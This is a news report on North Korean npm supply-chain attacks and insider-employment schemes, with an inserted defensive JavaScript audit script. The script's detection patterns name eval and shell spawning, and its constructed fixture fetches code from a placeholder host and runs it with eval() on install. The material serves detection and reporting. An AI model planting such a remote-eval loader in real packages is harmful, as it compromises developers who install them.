Threat actors linked to North Korea have been observed publishing a number of malicious packages to the npm registry, indicating a “coordinated and relentless” effort to target software developers and steal cryptocurrency assets.
The latest wave, observed between August 12 and 27, 2024, included packages named temp-etherscan-api, ethersscan-api, telegram-con, helmet-validate, and qq-console.
“The behavior of this package leads us to believe that qq-console is related to a North Korean campaign known as Contagious Interview,” software security firm Phylum said.
Contagious Interview refers to an ongoing campaign that seeks to compromise software developers with information-stealing malware as part of a supposed interview process, tricking them into downloading bogus npm packages or fake installers for video conferencing software such as MiroTalk hosted on fraudulent websites.
The ultimate goal of the attacks is to deploy a Python payload called InvisibleFerret that can extract sensitive data from cryptocurrency wallet browser extensions and set up persistence on the host using legitimate remote desktop software such as AnyDesk. CrowdStrike tracks the activity under the alias Famous Chollima.
The recently spotted helmet-validate package takes a new approach: it embeds a piece of JavaScript code in a file called config.js that directly executes JavaScript hosted on a remote domain (“ipcheck(.)cloud”) using the eval() function.
“Our investigation revealed that ipcheck(.)cloud resolves to the same IP address (167(.)88(.)36(.)13) that mirotalk(.)net resolves to when online,” Phylum said, highlighting potential links between the two sets of attacks.
The company said it also noticed another package called sass-notification, uploaded on August 27, 2024, which bore similarities to previously flagged malicious npm libraries such as call-blockflow. These packages have been attributed to another North Korean threat group called Moonstone Sleet.
“These attacks are characterized by the use of JavaScript obfuscation to write and execute batch and PowerShell scripts,” it said. “The scripts download and decrypt a remote payload, execute it as a DLL, and then attempt to clean up all traces of malicious activity, leaving behind a seemingly benign package on the victim’s machine.”
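The helmet-validate loader described above (remote JavaScript handed straight to eval()) and the script-spawning behaviour attributed to Moonstone Sleet are both cheap to screen for before a package is ever installed. The audit below is an added defensive example, not code from the article, Phylum or CrowdStrike; the package contents and the host name loader.example.invalid are constructed for the demonstration.

```javascript
// Added defensive example (not from the article or Phylum): a static pre-install audit
// that flags remote JavaScript handed to eval(), install-time hooks, and shell spawning.
const INDICATORS = [
  { id: "eval-call", re: /\beval\s*\(/ },
  { id: "remote-fetch", re: /\b(?:axios\.get|fetch|https?\.(?:get|request))\s*\(\s*["'`]https?:\/\//i },
  { id: "shell-spawn", re: /\b(?:exec|spawn|execSync|spawnSync)\s*\(\s*["'`](?:cmd|powershell|pwsh|bash|sh)\b/i },
];
const HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// files: { "relative/path": "file text" } as unpacked from a package tarball
function auditPackage(files) {
  const findings = [];
  const manifest = files["package.json"] ? JSON.parse(files["package.json"]) : {};
  for (const hook of HOOKS) {
    if (manifest.scripts && manifest.scripts[hook]) {
      findings.push({ file: "package.json", id: `install-hook:${hook}`, line: 0 });
    }
  }
  for (const [path, text] of Object.entries(files)) {
    if (!/\.(?:c?js|mjs)$/.test(path)) continue;
    text.split("\n").forEach((line, i) => {
      for (const ind of INDICATORS) {
        if (ind.re.test(line)) findings.push({ file: path, id: ind.id, line: i + 1 });
      }
    });
  }
  // A remote fetch and an eval() in the same file is the remote-loader pattern
  const idsByFile = new Map();
  for (const f of findings) {
    if (!idsByFile.has(f.file)) idsByFile.set(f.file, new Set());
    idsByFile.get(f.file).add(f.id);
  }
  const remoteEval = [...idsByFile]
    .filter(([, ids]) => ids.has("remote-fetch") && ids.has("eval-call"))
    .map(([file]) => file);
  const verdict = remoteEval.length ? "block" : findings.length ? "review" : "pass";
  return { findings, remoteEval, verdict };
}

// Constructed sample mimicking the layout described above (hypothetical host)
const SAMPLE_PACKAGE = {
  "package.json": JSON.stringify({ name: "example-validate", version: "1.0.0",
    main: "index.js", scripts: { postinstall: "node config.js" } }),
  "index.js": "module.exports = (h) => typeof h === 'object';\n",
  "config.js": "const axios = require('axios');\n" +
    "axios.get('https://loader.example.invalid/check').then((r) => {\n" +
    "  eval(r.data);\n});\n",
};
console.log(JSON.stringify(auditPackage(SAMPLE_PACKAGE), null, 2));
```

The sample yields a "block" verdict because config.js combines a remote fetch with eval(); a package with only an install hook or a shell spawn lands in "review" for a human look rather than an automatic block.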
Famous Chollima Poses as IT Workers at U.S. Firms
The disclosure comes as CrowdStrike linked Famous Chollima (formerly BadClone) to insider threat operations that entail infiltrating corporate environments under the pretext of legitimate employment.
“Famous Chollima conducted these operations while obtaining contract or full-time equivalent employment, using forged or stolen identification documents to bypass background checks,” the company said. “When applying for jobs, these malicious insiders submitted resumes that typically listed previous employment at a well-known company, as well as additional, lesser-known companies with no gaps in employment.”
While these attacks are mostly financially motivated, some incidents are said to involve the theft of sensitive information. CrowdStrike said it identified threat actors targeting or actively working for more than 100 unique companies over the past year, most of which are located in the United States, Saudi Arabia, France, the Philippines and Ukraine.
Top target sectors include technology, fintech, financial services, professional services, retail, transportation, manufacturing, insurance, pharmaceuticals, social media and media companies.
“After gaining employee-level access to the victim’s networks, the insiders performed minimal tasks related to their job roles,” the company further stated. “In some cases, insiders also attempted to steal data using Git, SharePoint, and OneDrive.”
“Additionally, insiders installed the following RMM tools: RustDesk, AnyDesk, TinyPilot, VS Code Dev Tunnels, and Google Chrome Remote Desktop. The insiders then used these RMM tools in tandem with the company’s network credentials, allowing multiple IP addresses to connect to the victim’s system.”